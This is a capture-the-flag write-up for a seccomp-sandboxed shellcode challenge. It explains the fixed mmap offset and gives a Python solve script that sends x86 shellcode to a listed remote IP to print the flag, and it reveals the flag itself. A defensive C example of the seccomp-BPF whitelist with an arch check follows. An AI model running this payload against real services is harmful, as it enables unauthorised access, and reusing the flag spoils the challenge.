The binary makes two mmap() calls. One region is mapped RWX, and user-supplied shellcode is copied into it and executed; the flag is copied into the other region. seccomp is then used to restrict the syscalls we can make: the whitelist contains only read, write, exit and exit_group.
Under current Linux ASLR, two mmap'ed regions are placed adjacent to each other, so knowing the address of one lets us compute the address of the other, since the offset between them is fixed. This is what the memory looks like:
gdb-peda$ vmmap
Start      End        Perm Name
0xf7fd6000 0xf7fd8000 rwxp mapped
0xf7fd8000 0xf7fdb000 rw-p mapped
gdb-peda$ x/s 0xf7fd8000
0xf7fd8000: "thisisaflag"

So we need a shellcode that writes the flag to stdout from a known offset. Below is the solution:
#!/usr/bin/env python3
import socket

ip = "127.0.0.1"        # local test target, overridden by the remote one below
ip = "54.163.248.69"
port = 9001

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))

# Shellcode: write(1, ecx + 0x2000, 0x100). When the shellcode runs, ecx holds the
# start of the RWX region, and the flag region sits 0x2000 above it (see vmmap).
# nasm > mov eax, 0x4
# 00000000  B804000000        mov eax,0x4
# nasm > mov ebx, 0x1
# 00000000  BB01000000        mov ebx,0x1
# nasm > lea ecx, [ecx+0x2000]
# 00000000  8D8900200000      lea ecx,[ecx+0x2000]
# nasm > mov edx, 0x100
# 00000000  BA00010000        mov edx,0x100
# nasm > int 0x80
# 00000000  CD80              int 0x80
payload = bytes.fromhex('B804000000BB010000008D8900200000BA00010000CD80')
soc.send(payload + b'\n')
print(soc.recv(0x100))

The flag for the challenge is d3sp3r4t3_sh3llc0d3.
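As an added example (not the challenge binary's own code), this is the seccomp-BPF filter such a sandbox installs, using the whitelist the writeup describes (read, write, exit, exit_group), plus a harness that forks a child to confirm that any other syscall is killed with SIGSYS. The helper names and the HOST_ARCH selection are assumptions; the arch check is the part worth noting, because a filter that checks nr alone will be fooled when a 32-bit int 0x80 call lands on a 64-bit kernel with different syscall numbers. Note what the whitelist does not do: keeping write(2) means any secret already mapped in the process, like the flag here, can still leave it.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <signal.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#if defined(__x86_64__)
#define HOST_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define HOST_ARCH AUDIT_ARCH_AARCH64
#else
#define HOST_ARCH AUDIT_ARCH_I386   /* the 32-bit target of the writeup */
#endif
/* Two BPF instructions: if nr == sys return ALLOW, else fall through. */
#define ALLOW(sys) BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (sys), 0, 1), \
                   BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW)
/* Added example, not the binary's code: install the challenge's whitelist. read,
 * write, exit and exit_group pass; anything else kills the process with SIGSYS. */
int install_whitelist(void) {
    struct sock_filter filter[] = {
        /* Check arch first: an int 0x80 call on x86_64 arrives as i386 with other numbers. */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, HOST_ARCH, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        ALLOW(SYS_read), ALLOW(SYS_write), ALLOW(SYS_exit), ALLOW(SYS_exit_group),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    };
    struct sock_fprog prog = { .len = sizeof filter / sizeof filter[0], .filter = filter };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return -1;  /* needed unless root */
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);      /* 0 on success */
}
/* Fork a child, sandbox it, and have it issue syscall nr with zeroed arguments.
 * Returns 1 if the child died from SIGSYS, 0 if the call went through, -1 on error. */
int syscall_is_blocked(long nr) {
    int status;
    pid_t pid = fork();
    if (pid == 0) {                                 /* child: sandbox, then try nr */
        if (install_whitelist() != 0) _exit(2);
        syscall(nr, 0, 0, 0);
        _exit(0);                                   /* exit_group: allowed */
    }
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSYS) return 1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

Run it under strace -f or watch for SIGSYS in the audit log to see the kill decision; a SECCOMP_RET_KILL hit is the detection signal a defender would alert on.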